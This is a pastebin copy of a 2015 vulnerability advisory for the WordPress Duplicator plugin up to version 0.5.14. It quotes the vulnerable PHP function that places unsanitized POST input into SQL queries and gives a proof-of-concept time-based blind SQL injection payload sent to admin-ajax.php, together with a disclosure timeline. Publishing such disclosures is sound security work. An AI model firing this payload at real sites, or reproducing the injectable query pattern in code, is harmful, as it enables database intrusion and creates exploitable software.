TEXT 21
WordPress Duplicator 0.5.14 Cross Site Request Forgery / SQL Injection Guest on 31st August 2020 12:43:14 PM
  1. ######################
  2.  
  3. # Exploit Title : Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF
  4.  
  5. # Exploit Author : Claudio Viviani
  6.  
  7. # Vendor Homepage : http://lifeinthegrid.com/labs/duplicator/
  8.  
  9. # Software Link : https://downloads.wordpress.org/plugin/duplicator.0.5.14.zip
  10.  
  11. # Date : 2015-04-08
  12.  
  13. # Tested on : Linux / Mozilla Firefox        
  14.  
  15. ######################
  16.  
  17. # Description
  18.  
  19.  Wordpress Duplicator 0.5.14 suffers from remote SQL Injection Vulnerability
  20.  
  21.  
  22.  Location file: /view/actions.php
  23.  
  24.  This is the bugged ajax functions wp_ajax_duplicator_package_delete:
  25.  
  26.  function duplicator_package_delete() {
  27.  
  28.   DUP_Util::CheckPermissions('export');
  29.  
  30.     try {
  31.   global $wpdb;
  32.   $json    = array();
  33.   $post    = stripslashes_deep($_POST);
  34.   $tblName  = $wpdb->prefix . 'duplicator_packages';
  35.   $postIDs  = isset($post['duplicator_delid']) ? $post['duplicator_delid'] : null;
  36.   $list    = explode(",", $postIDs);
  37.   $delCount  = 0;
  38.  
  39.         if ($postIDs != null) {
  40.  
  41.             foreach ($list as $id) {
  42.       $getResult = $wpdb->get_results("SELECT name, hash FROM `{$tblName}` WHERE id = {$id}", ARRAY_A);
  43.       if ($getResult) {
  44.         $row    =  $getResult[0];
  45.         $nameHash  = "{$row['name']}_{$row['hash']}";
  46.         $delResult  = $wpdb->query("DELETE FROM `{$tblName}` WHERE id = {$id}");
  47.         if ($delResult != 0) {
  48.  
  49.  
  50.  $post['duplicator_delid'] variable is not sanitized
  51.  
  52.  A authorized user with "export" permission or a remote unauthenticated attacker could
  53.  use this vulnerability to execute arbitrary SQL queries on the victim
  54.  WordPress web site by enticing an authenticated admin (CSRF)
  55.  
  56.  
  57. ######################
  58.  
  59. # PoC
  60.  
  61.  http://target/wp-admin/admin-ajax.php?action=duplicator_package_delete
  62.  
  63.  POST: duplicator_delid=1 and (select * from (select(sleep(20)))a)
  64.  
  65.  
  66. ######################
  67.  
  68. # Vulnerability Disclosure Timeline:
  69.  
  70. 2015-04-08:  Discovered vulnerability
  71. 2015-04-08:  Vendor Notification
  72. 2015-04-09:  Vendor Response/Feedback
  73. 2015-04-10:  Vendor Send Fix/Patch
  74. 2015-04-10:  Public Disclosure
  75.  
  76. #######################
  77.  
  78. Discovered By : Claudio Viviani
  79.                 http://www.homelab.it
  80.         http://ffhd.homelab.it (Free Fuzzy Hashes Database)
  81.  
  82.                 [email protected]
  83.                 [email protected]
  84.  
  85.                 https://www.facebook.com/homelabit
  86.                 https://twitter.com/homelabit
  87.                 https://plus.google.com/+HomelabIt1/
  88.                 https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
  89.  
  90. #####################

Paste is for source code and general debugging text.

Login or Register to edit, delete and keep track of your pastes and more.

Raw Paste

Login or Register to edit or fork this paste. It's free.